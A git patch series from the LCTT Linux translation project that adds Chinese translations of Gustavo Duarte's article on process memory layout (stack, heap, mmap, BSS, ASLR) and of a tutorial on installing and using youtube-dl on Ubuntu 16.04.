-It is possible to exhaust the area mapping the stack by pushing more data than it can fit. This triggers a page fault that is handled in Linux by [expand_stack()][9], which in turn calls [acct_stack_growth()][10] to check whether it’s appropriate to grow the stack. If the stack size is below RLIMIT_STACK (usually 8MB), then normally the stack grows and the program continues merrily, unaware of what just happened. This is the normal mechanism whereby stack size adjusts to demand. However, if the maximum stack size has been reached, we have a stack overflow and the program receives a Segmentation Fault. While the mapped stack area expands to meet demand, it does not shrink back when the stack gets smaller. Like the federal budget, it only expands.
-
-Dynamic stack growth is the [only situation][11] in which access to an unmapped memory region, shown in white above, might be valid. Any other access to unmapped memory triggers a page fault that results in a Segmentation Fault. Some mapped areas are read-only, hence write attempts to these areas also lead to segfaults.
-
-Below the stack, we have the memory mapping segment. Here the kernel maps contents of files directly to memory. Any application can ask for such a mapping via the Linux [mmap()][12] system call ([implementation][13]) or [CreateFileMapping()][14] / [MapViewOfFile()][15] in Windows. Memory mapping is a convenient and high-performance way to do file I/O, so it is used for loading dynamic libraries. It is also possible to create an anonymous memory mapping that does not correspond to any files, being used instead for program data. In Linux, if you request a large block of memory via [malloc()][16], the C library will create such an anonymous mapping instead of using heap memory. ‘Large’ means larger than MMAP_THRESHOLD bytes, 128 kB by default and adjustable via [mallopt()][17].
-
-Speaking of the heap, it comes next in our plunge into address space. The heap provides runtime memory allocation, like the stack, meant for data that must outlive the function doing the allocation, unlike the stack. Most languages provide heap management to programs. Satisfying memory requests is thus a joint affair between the language runtime and the kernel. In C, the interface to heap allocation is [malloc()][18] and friends, whereas in a garbage-collected language like C# the interface is the new keyword.
-
-If there is enough space in the heap to satisfy a memory request, it can be handled by the language runtime without kernel involvement. Otherwise the heap is enlarged via the [brk()][19]system call ([implementation][20]) to make room for the requested block. Heap management is [complex][21], requiring sophisticated algorithms that strive for speed and efficient memory usage in the face of our programs’ chaotic allocation patterns. The time needed to service a heap request can vary substantially. Real-time systems have [special-purpose allocators][22] to deal with this problem. Heaps also become _fragmented_ , shown below:
-
-![Fragmented Heap](http://static.duartes.org/img/blogPosts/fragmentedHeap.png)
-
-Finally, we get to the lowest segments of memory: BSS, data, and program text. Both BSS and data store contents for static (global) variables in C. The difference is that BSS stores the contents of _uninitialized_ static variables, whose values are not set by the programmer in source code. The BSS memory area is anonymous: it does not map any file. If you say static int cntActiveUsers, the contents of cntActiveUsers live in the BSS.
-
-The data segment, on the other hand, holds the contents for static variables initialized in source code. This memory area is not anonymous. It maps the part of the program’s binary image that contains the initial static values given in source code. So if you say static int cntWorkerBees = 10, the contents of cntWorkerBees live in the data segment and start out as 10\. Even though the data segment maps a file, it is a private memory mapping, which means that updates to memory are not reflected in the underlying file. This must be the case, otherwise assignments to global variables would change your on-disk binary image. Inconceivable!
-
-The data example in the diagram is trickier because it uses a pointer. In that case, the _contents_ of pointer gonzo – a 4-byte memory address – live in the data segment. The actual string it points to does not, however. The string lives in the text segment, which is read-only and stores all of your code in addition to tidbits like string literals. The text segment also maps your binary file in memory, but writes to this area earn your program a Segmentation Fault. This helps prevent pointer bugs, though not as effectively as avoiding C in the first place. Here’s a diagram showing these segments and our example variables:
-
-![ELF Binary Image Mapped Into Memory](http://static.duartes.org/img/blogPosts/mappingBinaryImage.png)
-
-You can examine the memory areas in a Linux process by reading the file /proc/pid_of_process/maps. Keep in mind that a segment may contain many areas. For example, each memory mapped file normally has its own area in the mmap segment, and dynamic libraries have extra areas similar to BSS and data. The next post will clarify what ‘area’ really means. Also, sometimes people say “data segment” meaning all of data + bss + heap.
-
-You can examine binary images using the [nm][23] and [objdump][24] commands to display symbols, their addresses, segments, and so on. Finally, the virtual address layout described above is the “flexible” layout in Linux, which has been the default for a few years. It assumes that we have a value for RLIMIT_STACK. When that’s not the case, Linux reverts back to the “classic” layout shown below:
-
-![Classic Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxClassicAddressSpaceLayout.png)
-
-That’s it for virtual address space layout. The next post discusses how the kernel keeps track of these memory areas. Coming up we’ll look at memory mapping, how file reading and writing ties into all this and what memory usage figures mean.
-
---------------------------------------------------------------------------------
-
-via: http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory/
-
-作者:[gustavo ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://duartes.org/gustavo/blog/about/
-[1]:http://duartes.org/gustavo/blog/post/cpu-rings-privilege-and-protection
-[2]:http://duartes.org/gustavo/blog/post/memory-translation-and-segmentation
-[3]:http://lxr.linux.no/linux+v2.6.28.1/fs/binfmt_elf.c#L542
-[4]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/mmap.c#L84
-[5]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/process_32.c#L729
-[6]:http://www.stanford.edu/~blp/papers/asrandom.pdf
-[7]:http://en.wikipedia.org/wiki/Lifo
-[8]:http://duartes.org/gustavo/blog/post/intel-cpu-caches
-[9]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1716
-[10]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1544
-[11]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/fault.c#L692
-[12]:http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html
-[13]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/sys_i386_32.c#L27
-[14]:http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
-[15]:http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
-[16]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
-[17]:http://www.kernel.org/doc/man-pages/online/pages/man3/undocumented.3.html
-[18]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
-[19]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
-[20]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L248
-[21]:http://g.oswego.edu/dl/html/malloc.html
-[22]:http://rtportal.upv.es/rtmalloc/
-[23]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/nm.1.html
-[24]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/objdump.1.html
diff --git a/translated/tech/20090127 Anatomy of a Program in Memory.md b/translated/tech/20090127 Anatomy of a Program in Memory.md
new file mode 100644
index 0000000000..aa478535f4
--- /dev/null
+++ b/translated/tech/20090127 Anatomy of a Program in Memory.md
@@ -0,0 +1,84 @@
+剖析内存中的程序
+============================================================
+
+内存管理是一个操作系统的核心任务;它对程序员和系统管理员来说也是至关重要的。在接下来的几篇文章中,我将从实践出发着眼于内存管理,并深入到它的内部结构。尽管这些概念很普通,示例也大都来自于 32 位 x86 架构的 Linux 和 Windows 上。第一篇文章描述了在内存中程序如何分布。
+
+在一个多任务操作系统中的每个进程都运行在它自己的内存“沙箱”中。这个沙箱是一个虚拟地址空间,它在 32 位的模式中它总共有 4GB 的内存地址块。这些虚拟地址是通过内核页表映射到物理地址的,并且这些虚拟地址是由操作系统内核来维护,进而被进程所消费的。每个进程都有它自己的一组页表,但是在它这里仅是一个钩子。一旦虚拟地址被启用,这些虚拟地址将被应用到这台电脑上的 _所有软件_,_包括内核本身_。因此,一部分虚拟地址空间必须保留给内核使用:
+
+![Kernel/User Memory Split](http://static.duartes.org/img/blogPosts/kernelUserMemorySplit.png)
+
+但是,这并不说内核就使用了很多的物理内存,恰恰相反,它只使用了很少一部分用于去做地址映射。内核空间在内核页表中被标记为仅 [特权代码][1] (ring 2 或更低)独占使用,因此,如果一个用户模式的程序尝试去访问它,将触发一个页面故障错误。在 Linux 中,内核空间是始终存在的,并且在所有进程中都映射相同的物理内存。内核代码和数据总是可寻址的,准备随时去处理中断或者系统调用。相比之下,用户模式中的地址空间,在每次进程切换时都会发生变化:
+
+![Process Switch Effects on Virtual Memory](http://static.duartes.org/img/blogPosts/virtualMemoryInProcessSwitch.png)
+
+蓝色的区域代表映射到物理地址的虚拟地址空间,白色的区域是尚未映射的部分。在上面的示例中,Firefox 因它令人惊奇的“狂吃”内存而使用了大量的虚拟内存空间。在地址空间中不同的组合对应了不同的内存段,像堆、栈、等等。请注意,这些段只是一系列内存地址的简化表示,它与 [Intel 类型的段][2] _并没有任何关系_ 。不过,这是一个在 Linux 中的标准的段布局:
+
+![Flexible Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxFlexibleAddressSpaceLayout.png)
+
+当计算是快乐、安全、讨人喜欢的时候,在机器中的几乎每个进程上,它们的起始虚拟地址段都是完全相同的。这将使远程挖掘安全漏洞变得容易。一个漏洞利用经常需要去引用绝对内存位置:在栈中的一个地址,这个地址可能是一个库的函数,等等。远程攻击必须要“盲选”这个地址,因为地址空间都是相同的。当攻击者们这样做的时候,人们就会受到伤害。因此,地址空间随机化开始流行起来。Linux 随机化栈、内存映射段、以及在堆上增加起始地址偏移量。不幸的是,32 位的地址空间是非常拥挤的,为地址空间随机化留下的空间不多,因此 [妨碍了地址空间随机化的效果][6]。
+
+在进程地址空间中最高的段是栈,在大多数编程语言中它存储本地变量和函数参数。调用一个方法或者函数将推送一个新的栈帧到这个栈。当函数返回时这个栈帧被删除。这个简单的设计,可能是因为数据严格遵循 [后进先出(LIFO)][7] 的次序,这意味着跟踪栈内容时不需要复杂的数据结构 – 一个指向栈顶的简单指针就可以做到。推送和弹出也因此而非常快且准确。也可能是,持续的栈区重用倾向于在 [CPU 缓存][8] 中保持活跃的栈内存,这样可以加快访问速度。进程中的每个线程都有它自己的栈。
+
+向栈中推送更多的而不是刚合适的数据可能会耗尽栈的映射区域。这将触发一个页面故障,在 Linux 中它是通过 [expand_stack()][9] 来处理的,它会去调用 [acct_stack_growth()][10] 来检查栈的增长是否正常。如果栈的大小低于 RLIMIT_STACK 的值(一般是 8MB 大小),那么这是一个正常的栈增长和程序的合理使用,否则可能是发生了未知问题。这是一个栈大小按需调节的常见机制。但是,栈的大小达到了上述限制,将会发生一个栈溢出,并且,程序将会收到一个段故障错误。当映射的栈为满足需要而扩展后,在栈缩小时,映射区域并不会收缩。就像美国联邦政府的预算一样,它只会扩张。
+
+动态栈增长是 [唯一例外的情况][11] ,当它去访问一个未映射的内存区域,如上图中白色部分,是允许的。除此之外的任何其它访问未映射的内存区域将在段故障中触发一个页面故障。一些映射区域是只读的,因此,尝试去写入到这些区域也将触发一个段故障。
+
+在栈的下面,有内存映射段。在这里,内核将文件内容直接映射到内存。任何应用程序都可以通过 Linux 的 [mmap()][12] 系统调用( [实现][13])或者 Windows 的 [CreateFileMapping()][14] / [MapViewOfFile()][15] 来请求一个映射。内存映射是实现文件 I/O 的方便高效的方式。因此,它经常被用于加载动态库。有时候,也被用于去创建一个并不匹配任何文件的匿名内存映射,这种映射经常被用做程序数据的替代。在 Linux 中,如果你通过 [malloc()][16] 去请求一个大的内存块,C 库将会创建这样一个匿名映射而不是使用堆内存。这里的‘大’ 表示是超过了MMAP_THRESHOLD 设置的字节数,它的缺省值是 128 kB,可以通过 [mallopt()][17] 去调整这个设置值。
+
+接下来讲的是“堆”,就在我们接下来的地址空间中,堆提供运行时内存分配,像栈一样,但又不同于栈的是,它分配的数据生存期要长于分配它的函数。大多数编程语言都为程序去提供堆管理支持。因此,满足内存需要是编程语言运行时和内核共同来做的事情。在 C 中,堆分配的接口是 [malloc()][18] ,它是个用户友好的接口,然而在编程语言的垃圾回收中,像 C# 中,这个接口使用 new 关键字。
+
+如果在堆中有足够的空间去满足内存请求,它可以由编程语言运行时来处理内存分配请求,而无需内核参与。否则将通过 [brk()][19] 系统调用([实现][20])来扩大堆以满足内存请求所需的大小。堆的管理是比较 [复杂的][21],在面对我们程序的混乱分配模式时,它通过复杂的算法,努力在速度和内存使用效率之间取得一种平衡。服务一个堆请求所需要的时间可能是非常可观的。实时系统有一个 [特定用途的分配器][22] 去处理这个问题。堆也会出现 _碎片化_ ,如下图所示:
+
+![Fragmented Heap](http://static.duartes.org/img/blogPosts/fragmentedHeap.png)
+
+最后,我们取得了内存的低位段:BSS、数据、以及程序文本。在 C 中,静态(全局)变量的内容都保存在 BSS 和数据中。它们之间的不同之处在于,BSS 保存 _未初始化的_ 静态变量的内容,它的值在源代码中并没有被程序员设置。BSS 内存区域是_匿名_的:它没有映射到任何文件上。如果你在程序中写这样的语句 static int cntActiveUsers,cntActiveUsers 的内容就保存在 BSS 中。
+
+反过来,数据段,用于保存在源代码中静态变量_初始化后_的内容。这个内存区域是_非匿名_的。它映射到程序的二进值镜像上的一部分,这个二进制镜像包含在源代码中给定初始化值的静态变量内容。因此,如果你在程序中写这样的语句 static int cntWorkerBees = 10,那么,cntWorkerBees 的内容就保存在数据段中,并且初始值为 10。尽管可以通过数据段映射到一个文件,但是这是一个私有内存映射,意味着,如果在内存中这个文件发生了变化,它并不会将这种变化反映到底层的文件上。必须是这样的,否则,分配的全局变量将会改变你磁盘上的二进制文件镜像,这种做法就太不可思议了!
+
+用图去展示一个数据段是很困难的,因为它使用一个指针。在那种情况下,指针 gonzo 的_内容_ – 保存在数据段上的一个 4 字节的内存地址。它并没有指向一个真实的字符串。而这个字符串存在于文本段中,文本段是只读的,它用于保存你的代码中的类似于字符串常量这样的内容。文本段也映射你的内存中的库,但是,如果你的程序写入到这个区域,将会触发一个段故障错误。尽管在 C 中,它比不上从一开始就避免这种指针错误那么有效,但是,这种机制也有助于避免指针错误。这里有一个展示这些段和示例变量的图:
+
+![ELF Binary Image Mapped Into Memory](http://static.duartes.org/img/blogPosts/mappingBinaryImage.png)
+
+你可以通过读取 /proc/pid_of_process/maps 文件来检查 Linux 进程中的内存区域。请记住,一个段可以包含很多的区域。例如,每个内存映射的文件一般都在 mmap 段中的它自己的区域中,而动态库有类似于BSS 和数据一样的额外的区域。下一篇文章中我们将详细说明“区域(area)”的真正含义是什么。此外,有时候人们所说的“数据段(data segment)”是指“数据 + BSS + 堆”。
+
+你可以使用 [nm][23] 和 [objdump][24] 命令去检查二进制镜像,去显示它们的符号、地址、段、等等。最终,在 Linux 中上面描述的虚拟地址布局是一个“弹性的”布局,这就是这几年来的缺省情况。它假设 RLIMIT_STACK 有一个值。如果没有值的话,Linux 将恢复到如下所示的“经典” 布局:
+
+![Classic Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxClassicAddressSpaceLayout.png)
+
+这就是虚拟地址空间布局。接下来的文章将讨论内核如何对这些内存区域保持跟踪、内存映射、文件如何读取和写入、以及内存使用数据的意义。
+
+--------------------------------------------------------------------------------
+
+via: http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory/
+
+作者:[gustavo ][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:http://duartes.org/gustavo/blog/post/cpu-rings-privilege-and-protection
+[2]:http://duartes.org/gustavo/blog/post/memory-translation-and-segmentation
+[3]:http://lxr.linux.no/linux+v2.6.28.1/fs/binfmt_elf.c#L542
+[4]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/mmap.c#L84
+[5]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/process_32.c#L729
+[6]:http://www.stanford.edu/~blp/papers/asrandom.pdf
+[7]:http://en.wikipedia.org/wiki/Lifo
+[8]:http://duartes.org/gustavo/blog/post/intel-cpu-caches
+[9]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1716
+[10]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1544
+[11]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/fault.c#L692
+[12]:http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html
+[13]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/sys_i386_32.c#L27
+[14]:http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
+[15]:http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
+[16]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
+[17]:http://www.kernel.org/doc/man-pages/online/pages/man3/undocumented.3.html
+[18]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
+[19]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
+[20]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L248
+[21]:http://g.oswego.edu/dl/html/malloc.html
+[22]:http://rtportal.upv.es/rtmalloc/
+[23]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/nm.1.html
+[24]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/objdump.1.html
From b8f5b0511157a786086bb61cbce7635e60771b2a Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 15:00:49 +0800
Subject: [PATCH 237/371] Translating by qhwdw
---
sources/tech/20090203 How the Kernel Manages Your Memory.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20090203 How the Kernel Manages Your Memory.md b/sources/tech/20090203 How the Kernel Manages Your Memory.md
index 9eb30b0b23..2a95c74ecb 100644
--- a/sources/tech/20090203 How the Kernel Manages Your Memory.md
+++ b/sources/tech/20090203 How the Kernel Manages Your Memory.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
How the Kernel Manages Your Memory
============================================================
From fde2744a890ec106011d8e54a407eaabea44009f Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 15:53:31 +0800
Subject: [PATCH 238/371] translate done: 20171012 Install and Use YouTube-DL
on Ubuntu 16.04.md
---
...tall and Use YouTube-DL on Ubuntu 16.04.md | 155 ---------------
...tall and Use YouTube-DL on Ubuntu 16.04.md | 176 ++++++++++++++++++
2 files changed, 176 insertions(+), 155 deletions(-)
delete mode 100644 sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
create mode 100644 translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
diff --git a/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md b/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
deleted file mode 100644
index dc0391768e..0000000000
--- a/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
+++ /dev/null
@@ -1,155 +0,0 @@
-translating by lujun9972
-Install and Use YouTube-DL on Ubuntu 16.04
-======
-
-Youtube-dl is a free and open source command line video download tools that can be used to download video from Youtube and other websites like, Facebook, Dailymotion, Google Video, Yahoo and much more. It is based on pygtk and requires Python to run this software. It supports many operating system including, Windows, Mac and Unix. Youtube-dl supports resuming interrupted downloads, channel or playlist download, add custom title, proxy and much more.
-
-In this tutorial, we will learn how to install and use Youtube-dl and Youtube-dlg on Ubuntu 16.04. We will also learn how to download Youtube video in different quality and formats.
-
-### Requirements
-
- * A server running Ubuntu 16.04.
- * A non-root user with sudo privileges setup on your server.
-
-
-
-Let's start by updating your system to the latest version with the following command:
-
-```
-sudo apt-get update -y
-sudo apt-get upgrade -y
-```
-
-After updating, restart the system to apply all these changes.
-
-### Install Youtube-dl
-
-By default, Youtube-dl is not available in the Ubuntu-16.04 repository. So you will need to download it from their official website. You can download it with the curl command:
-
-First, install curl with the following command:
-
-sudo apt-get install curl -y
-
-Next, download the youtube-dl binary:
-
-curl -L https://yt-dl.org/latest/youtube-dl -o /usr/bin/youtube-dl
-
-Next, change the permission of the youtube-dl binary package with the following command:
-
-sudo chmod 755 /usr/bin/youtube-dl
-
-Once youtube-dl is installed, you can proceed to the next step.
-
-### Use Youtube-dl
-
-You can list all the available options with youtube-dl, run the following command:
-
-youtube-dl --h
-
-Youtube-dl supports many Video formats such as Mp4, WebM, 3gp, and FLV. You can list all the available formats for specific Video with the following command:
-
-youtube-dl -F https://www.youtube.com/watch?v=j_JgXJ-apXs
-
-You should see the all the available formats for this video as below:
-```
-[info] Available formats for j_JgXJ-apXs:
-format code extension resolution note
-139 m4a audio only DASH audio 56k , m4a_dash container, [[email protected]][1] 48k (22050Hz), 756.44KiB
-249 webm audio only DASH audio 56k , opus @ 50k, 724.28KiB
-250 webm audio only DASH audio 69k , opus @ 70k, 902.75KiB
-171 webm audio only DASH audio 110k , [[email protected]][1], 1.32MiB
-251 webm audio only DASH audio 122k , opus @160k, 1.57MiB
-140 m4a audio only DASH audio 146k , m4a_dash container, [[email protected]][1] (44100Hz), 1.97MiB
-278 webm 256x144 144p 97k , webm container, vp9, 24fps, video only, 1.33MiB
-160 mp4 256x144 DASH video 102k , avc1.4d400c, 24fps, video only, 731.53KiB
-133 mp4 426x240 DASH video 174k , avc1.4d4015, 24fps, video only, 1.36MiB
-242 webm 426x240 240p 221k , vp9, 24fps, video only, 1.74MiB
-134 mp4 640x360 DASH video 369k , avc1.4d401e, 24fps, video only, 2.90MiB
-243 webm 640x360 360p 500k , vp9, 24fps, video only, 4.15MiB
-135 mp4 854x480 DASH video 746k , avc1.4d401e, 24fps, video only, 6.11MiB
-244 webm 854x480 480p 844k , vp9, 24fps, video only, 7.27MiB
-247 webm 1280x720 720p 1155k , vp9, 24fps, video only, 9.21MiB
-136 mp4 1280x720 DASH video 1300k , avc1.4d401f, 24fps, video only, 9.66MiB
-248 webm 1920x1080 1080p 1732k , vp9, 24fps, video only, 14.24MiB
-137 mp4 1920x1080 DASH video 2217k , avc1.640028, 24fps, video only, 15.28MiB
-17 3gp 176x144 small , mp4v.20.3, [[email protected]][1] 24k
-36 3gp 320x180 small , mp4v.20.3, mp4a.40.2
-43 webm 640x360 medium , vp8.0, [[email protected]][1]
-18 mp4 640x360 medium , avc1.42001E, [[email protected]][1] 96k
-22 mp4 1280x720 hd720 , avc1.64001F, [[email protected]][1] (best)
-
-```
-
-Next, choose any format you want to download with the flag -f as shown below:
-
-youtube-dl -f 18 https://www.youtube.com/watch?v=j_JgXJ-apXs
-
-This command will download the Video in mp4 format at 640x360 resolution:
-```
-[youtube] j_JgXJ-apXs: Downloading webpage
-[youtube] j_JgXJ-apXs: Downloading video info webpage
-[youtube] j_JgXJ-apXs: Extracting video information
-[youtube] j_JgXJ-apXs: Downloading MPD manifest
-[download] Destination: B.A. PASS 2 Trailer no 2 _ Filmybox-j_JgXJ-apXs.mp4
-[download] 100% of 6.90MiB in 00:47
-
-```
-
-If you want to download Youtube video in mp3 audio format, then it is also possible with the following command:
-
-youtube-dl https://www.youtube.com/watch?v=j_JgXJ-apXs -x --audio-format mp3
-
-You can download all the videos of specific channels by appending the channel's URL as shown below:
-
-youtube-dl -citw https://www.youtube.com/channel/UCatfiM69M9ZnNhOzy0jZ41A
-
-If your network is behind the proxy, then you can download the video using --proxy flag as shown below:
-
-youtube-dl --proxy http://proxy-ip:port https://www.youtube.com/watch?v=j_JgXJ-apXs
-
-To download the list of many Youtube videos with the single command, then first save all the Youtube video URL in a file called youtube-list.txt and run the following command to download all the videos:
-
-youtube-dl -a youtube-list.txt
-
-### Install Youtube-dl GUI
-
-If you are looking for a graphical tool for youtube-dl, then youtube-dlg is the best choice for you. youtube-dlg is a free and open source tool for youtube-dl written in wxPython.
-
-By default, this tool is not available in Ubuntu 16.04 repository. So you will need to add PPA for that.
-
-sudo add-apt-repository ppa:nilarimogard/webupd8
-
-Next, update your package repository and install youtube-dlg with the following command:
-
-sudo apt-get update -y
-sudo apt-get install youtube-dlg -y
-
-Once Youtube-dl is installed, you can launch it from Unity Dash as shown below:
-
-[![][2]][3]
-
-[![][4]][5]
-
-You can now easily download any Youtube video as you wish just paste their URL in the URL field shown in the above image. Youtube-dlg is very useful for those people who don't know command line.
-
-### Conclusion
-
-Congratulations! You have successfully installed youtube-dl and youtube-dlg on Ubuntu 16.04 server. You can now easily download any videos from Youtube and any youtube-dl supported sites in any formats and any size.
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/tutorial/install-and-use-youtube-dl-on-ubuntu-1604/
-
-作者:[Hitesh Jethva][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:/cdn-cgi/l/email-protection
-[2]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dash.png
-[3]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dash.png
-[4]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dashboard.png
-[5]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dashboard.png
diff --git a/translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md b/translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
new file mode 100644
index 0000000000..a40a1194d4
--- /dev/null
+++ b/translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
@@ -0,0 +1,176 @@
+在 Ubuntu 16.04 上安装并使用 YouTube-DL
+======
+
+Youtube-dl 是一个免费而开源的命令行视频下载工具,可以用来从 Youtube 等类似的网站上下载视频,目前它支持的网站除了 Youtube 还有 Facebook,Dailymotion,Google Video,Yahoo 等等。它构架于 pygtk 之上,需要 Python 的支持来运行。它支持很多操作系统,包括 Windows,Mac 以及 Unix。Youtube-dl 还有断点续传,下载整个频道或者整个播放清单中的视频,添加自定义的标题,代理,等等其他功能。
+
+本文中,我们将来学习如何在 Ubuntu16.04 上安装并使用 Youtube-dl 和 Youtube-dlg。我们还会学习如何以不同质量,不同格式来下载 Youtube 中的视频。
+
+### 前置需求
+
+ * 一台运行 Ubuntu 16.04 的服务器。
+ * 非 root 用户但拥有 sudo 特权。
+
+让我们首先用下面命令升级系统到最新版:
+
+```
+sudo apt-get update -y
+sudo apt-get upgrade -y
+```
+
+然后重启系统应用这些变更。
+
+### 安装 Youtube-dl
+
+默认情况下,Youtube-dl 并不在 Ubuntu-16.04 仓库中。你需要从官网上来下载它。使用 curl 命令可以进行下载:
+
+首先,使用下面命令安装 curl:
+
+```
+sudo apt-get install curl -y
+```
+
+然后,下载 youtube-dl 的二进制包:
+
+```
+curl -L https://yt-dl.org/latest/youtube-dl -o /usr/bin/youtube-dl
+```
+
+接着,用下面命令更改 youtube-dl 二进制包的权限:
+
+```
+sudo chmod 755 /usr/bin/youtube-dl
+```
+
+youtube-dl 有算是安装好了,现在可以进行下一步了。
+
+### 使用 Youtube-dl
+
+运行下面命令会列出 youtube-dl 的所有可选项:
+
+```
+youtube-dl --h
+```
+
+Youtube-dl 支持多种视频格式,像 Mp4,WebM,3gp,以及 FLV 都支持。你可以使用下面命令列出指定视频所支持的所有格式:
+
+```
+youtube-dl -F https://www.youtube.com/watch?v=j_JgXJ-apXs
+```
+
+如下所示,你会看到该视频所有可能的格式:
+
+```
+[info] Available formats for j_JgXJ-apXs:
+format code extension resolution note
+139 m4a audio only DASH audio 56k , m4a_dash container, mp4a.40.5@ 48k (22050Hz), 756.44KiB
+249 webm audio only DASH audio 56k , opus @ 50k, 724.28KiB
+250 webm audio only DASH audio 69k , opus @ 70k, 902.75KiB
+171 webm audio only DASH audio 110k , vorbis@128k, 1.32MiB
+251 webm audio only DASH audio 122k , opus @160k, 1.57MiB
+140 m4a audio only DASH audio 146k , m4a_dash container, mp4a.40.2@128k (44100Hz), 1.97MiB
+278 webm 256x144 144p 97k , webm container, vp9, 24fps, video only, 1.33MiB
+160 mp4 256x144 DASH video 102k , avc1.4d400c, 24fps, video only, 731.53KiB
+133 mp4 426x240 DASH video 174k , avc1.4d4015, 24fps, video only, 1.36MiB
+242 webm 426x240 240p 221k , vp9, 24fps, video only, 1.74MiB
+134 mp4 640x360 DASH video 369k , avc1.4d401e, 24fps, video only, 2.90MiB
+243 webm 640x360 360p 500k , vp9, 24fps, video only, 4.15MiB
+135 mp4 854x480 DASH video 746k , avc1.4d401e, 24fps, video only, 6.11MiB
+244 webm 854x480 480p 844k , vp9, 24fps, video only, 7.27MiB
+247 webm 1280x720 720p 1155k , vp9, 24fps, video only, 9.21MiB
+136 mp4 1280x720 DASH video 1300k , avc1.4d401f, 24fps, video only, 9.66MiB
+248 webm 1920x1080 1080p 1732k , vp9, 24fps, video only, 14.24MiB
+137 mp4 1920x1080 DASH video 2217k , avc1.640028, 24fps, video only, 15.28MiB
+17 3gp 176x144 small , mp4v.20.3, mp4a.40.2@ 24k
+36 3gp 320x180 small , mp4v.20.3, mp4a.40.2
+43 webm 640x360 medium , vp8.0, vorbis@128k
+18 mp4 640x360 medium , avc1.42001E, mp4a.40.2@ 96k
+22 mp4 1280x720 hd720 , avc1.64001F, mp4a.40.2@192k (best)
+```
+
+然后使用 `-f` 指定你想要下载的格式,如下所示:
+
+```
+youtube-dl -f 18 https://www.youtube.com/watch?v=j_JgXJ-apXs
+```
+
+该命令会下载 640x360 分辨率的 mp4 格式的视频:
+```
+[youtube] j_JgXJ-apXs: Downloading webpage
+[youtube] j_JgXJ-apXs: Downloading video info webpage
+[youtube] j_JgXJ-apXs: Extracting video information
+[youtube] j_JgXJ-apXs: Downloading MPD manifest
+[download] Destination: B.A. PASS 2 Trailer no 2 _ Filmybox-j_JgXJ-apXs.mp4
+[download] 100% of 6.90MiB in 00:47
+
+```
+
+如果你想以 mp3 音频的格式下载 Youtube 视频,也可以做到:
+
+```
+youtube-dl https://www.youtube.com/watch?v=j_JgXJ-apXs -x --audio-format mp3
+```
+
